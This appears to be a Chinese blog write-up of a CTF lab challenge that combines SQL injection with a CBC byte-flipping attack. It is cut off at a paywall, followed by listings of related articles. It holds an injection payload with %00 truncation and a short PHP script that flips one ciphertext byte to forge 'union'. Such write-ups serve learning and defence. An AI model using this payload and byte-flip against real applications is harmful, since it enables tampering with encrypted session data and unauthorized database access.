实验吧---简单的登陆题(CBC字节翻转攻击)

最新推荐文章于 2024-07-30 16:14:32 发布
最新推荐文章于 2024-07-30 16:14:32 发布
阅读量3.8k 收藏 3
点赞数
分类专栏: 网络安全 文章标签: sql注入 CBC字节翻转攻击 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/popvip44/article/details/79335189
版权
本文介绍了使用PHP重新实现CBC字节翻转攻击的过程,遇到的问题及解决方案,包括SQL注入、%00截断和Python编码问题的讨论。在实践中发现%00截断可能因PHP或MySQL的更新而失效,并解释了为何攻击时需要修改第6个字节而非第5个字节的原因。
摘要由CSDN通过智能技术生成

具体原理就不介绍了,百度上很多,直接放代码。因为用python3执行pcat大神的脚本出现很多语法和编码问题,所以打算用php脚本重写一遍攻击过程。

第一步:填写0 2nion select * from((select 1)a join (select * from you_want)b join (select 3)c);%00

提交后取得返回的cipher,替换php中的字符串,执行php文件,代码如下:

<?php 
$cipher_new = base64_decode(urldecode('E%2F2btd4lXULo0you%2FWrX2koJP%2BTE3geRjh0KCNQQ%2BIG54oHA5d3PDDejYyPIJgha49NuNN1A3GWbf7r9JiLun8reIPrsAjymZJFBNDnZYX8mw9Q6aFKKGWQTZxrlwNB04I9a%2FFnBGq1kpTcPtlLrwg%3D%3D'));//获得的cipher替换此处的字符串
$cipher_new[6]=$cipher_new[6]^'2'^'u';//CBC字节翻转攻击
$cipher_new = urlencode(base64_encode($cipher_new));//编码
printf("%s",$cipher_new);//输出,可以重定向到某个文件中,便于粘贴
?>

第二步,把从第一步得到的cipher_new填写到请求头中,替换原有的cipher,发起请求,获得plain,用第一步获得的iv和现在得到的plain替换php文件中的字符串,执行php文件,获得iv_new,代码如下:

&l
最低0.47元/天 解锁文章
silenci
关注
专栏目录
【愚公系列】2022年04月 密码学攻击-CBC字节翻转攻击
时光隧道
09-23 4万+
关于CBC CBC全称Cipher Block Chaining模式(密文分组链接模式),“分组“是指加密和解密过程都是以分组进行的。每一个分组大小为128bits(16字节),如果明文的长度不是16字节的整数倍,需要对最后一个分组进行填充(padding),使得最后一个分组长度为16字节。“链接”是指密文分组分组像链条一样相互连接在一起。 对本节课使用到的异或的简单描述 如果a、b两个值不相同,则异或结果为1。 如果a、b两个值相同,异或结果为0。 异或也叫半加运算,其运算法则相当于不带进位的二进..
简单登录-关于CBC字节翻转攻击
bylfsj的博客
09-30 665
以下内容主要参考pcat的writeup,并加入个人的一点理解。一、目概况1、目CTF实验吧的一道目,比较有意思,记下来以供回顾。URL:http://ctf5.shiyanbar.com/web/jiandan/index.php,进入后显示 无论输什么id,均返回:Hello!2、入手在进入登录界面时抓包,看响应中有提示:tips:test.php 则登录http:/...
简单的CTF
weixin_44147777的博客
12-21 2743
1.key 此只需在点开链接后查看原码(按f12)即可得到key
【密码学】 字节反转攻击
最新发布
qq_50296568的博客
07-30 824
字节反转攻击
一个简单的登录问
hezhang1983的专栏
05-31 855
用户登录是最常用,最基本的. protected void BtnOK_Click(object sender, EventArgs e) { SqlConnection cn = new SqlConnection(@"data source=(local);user id=sa;password=;initial catalog=database;integrated security=ssp
简单的登录
ruiguang21的博客
02-27 1010
&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; &lt;html xmlns="http://www.w3.org/1999/xhtml"&gt; &lt;head&gt; &lt;met
实验简单的登录 CBC字节翻转攻击
include_heqile的博客
04-15 5417
本文CBC脚本部分参考了:http://hebin.me/2018/01/26/西普ctf-简单的登录/ 首先对这道进行了抓包 在抓包的时候,看到了这个: 直接在浏览器地址栏中输入URL:http://ctf5.shiyanbar.com/web/jiandan/test.php 将代码粘贴到编辑器中,格式化代码: &amp;lt;?php define(&quot;SECRET_KEY&quot;...
4.实验
xg_17_38241417112的博客
11-24 318
#include int main() {     char ch; printf("请输入一个小写字母:"); scanf("%d",&ch); ch=getchar(); ch=ch-32; printf("ch=%c\n",ch); return 0; } 知识点:大写字母与小写字母的转化 心得体会:学会大写字母与小写字母的转化。
CBC字节翻转攻击与padding oracle攻击
06-06
CBC字节翻转攻击与padding oracle攻击 CBC 字节翻转攻击是指在使用 CBC 加密模式时,如果攻击者可以控制明文最后的一部分,并且可以观察到密文的变化,那么攻击者可以通过修改明文的最后一部分来观察密文的变化,...
Crypto日记之AES-CBC bit翻转攻击
zgzhzywzd的博客
03-15 7021
0x01 前言 攻防世界刷遇到了一道AES-CBC 字节翻转攻击目。 0x02 目CISCN-2018-Quals-intersting 下载附件得到了两个文档,一个python脚本和一个heheda.txt的文档,python脚本如下: import flag import hashlib from Crypto.Util.number import getPrime, long_to_bytes, bytes_to_long from Crypto.Cipher import AES
CBC字节反转攻击详解
qq_45698157的博客
11-17 4825
前言 CBC全称为密码分组链接模式。不同于ECB模式,在CBC模式中,每个明文块先与前一个密文块儿进行异或后,在进行加密。这种加密模式很好的隐藏了明文的统计特性,但是同样也暴露出了一个很严重的缺点。本文将针对CBC模式的特点,详细讲解字节反转攻击的原理及应用。 一、CBC加密模式 Plaintext:明文 IV:初始化向量 Ciphertext:加密后的数据 Key:密钥 加密过程转化成文字来叙述: 先将Plaintext分组(常见以16字节为一组) 生成初始化向量IV和密钥K
python练习 1 简易登录
zhangjiabin1010的博客
12-22 566
user_data = {} #定义一个集 def new_user():#新用户函数 prompt = '请输入用户名' while True: name = input(prompt) if name in user_data: print('用户名已存在,请重新输入') continue else:
bugku-login4-CBC字节翻转攻击
XL115715453的博客
09-26 354
CBC模式:Cipher Black Chaining mode(密码分组链接模式) CBC模式进行加解密是都需要一个随机初始向量iv,在第一轮进行加解密是都需要与iv进行xor的。 1.加解密过程 0x01:加密过程如下图(来自《图解密码技术》一书)  0x02:解密过程(来自《图解密码技术》一书) CBC模式的加密过程主要分为这几步:   1. 将...
BUGKU-login4-CBC字节反转攻击
weixin_43803070的博客
07-13 504
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">; <html> <head> <meta http-equiv="Content-Type" content="t...
(转)SSl加密详解及CBC原理
daeees的专栏
07-01 2459
<br />/* full   handshake. <br />  <br />            Client                                                                                               Server <br /><br />            ClientHello                                     --------> <br />       
在bugku关于CBC翻转攻击思路
weixin_34186931的博客
08-19 217
今天在bugku遇到关于CBC翻转攻击目,总结了一下关于CBC翻转攻击的原理,以及关于这道目的解思路 CBC翻转攻击的主要目的:通过损坏密文字节来改变明文字节。(注:借助CBC内部的模式) 通过添加单引号等恶意字符来绕过过滤器,或通过将用户ID更改为admin来提升权限,或者更改应用程序所需的明文的任何其他后果。 加密过程: 上图CBC加...
CBC 字节翻转攻击记录—以 Bugku 目为例
weixin_34337265的博客
06-04 288
博客本文地址:https://www.yourhome.ren/index.php/sec/366.html 经典的CBC字节翻转攻击,还是有必要再通过一篇博文来记录一下的,也是作为一枚菜鸡的备忘录。 0x01 CBC加密流程 CBC加密的特性,简述来说: 明文首先被分割成等长的若干个明文块,每个明文块将作为...
CBC翻转攻击(实验吧_简单登陆)
weixin_30550081的博客
04-13 119
目链接 http://ctf5.shiyanbar.com/web/jiandan/index.php 有源码在test.php页面 分析代码过程 如果post id,将id转字符串,然后进入sqliCheck函数, 如果函数返回true,就停了, 否则,将id转成array 然后到login函数 这里将$info序列化,然后aes加密,进行b...
理解CBC字节翻转与padding oracle攻击:加密模式剖析
CBC字节翻转攻击是一种针对CBC模式的攻击手段,它利用了CBC模式中每个明文块与前一个密文块异或的特性。攻击者通过操纵中间环节,尝试改变密文中的特定字节,进而影响明文内容。例如,如果攻击者能够控制密文的某一...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值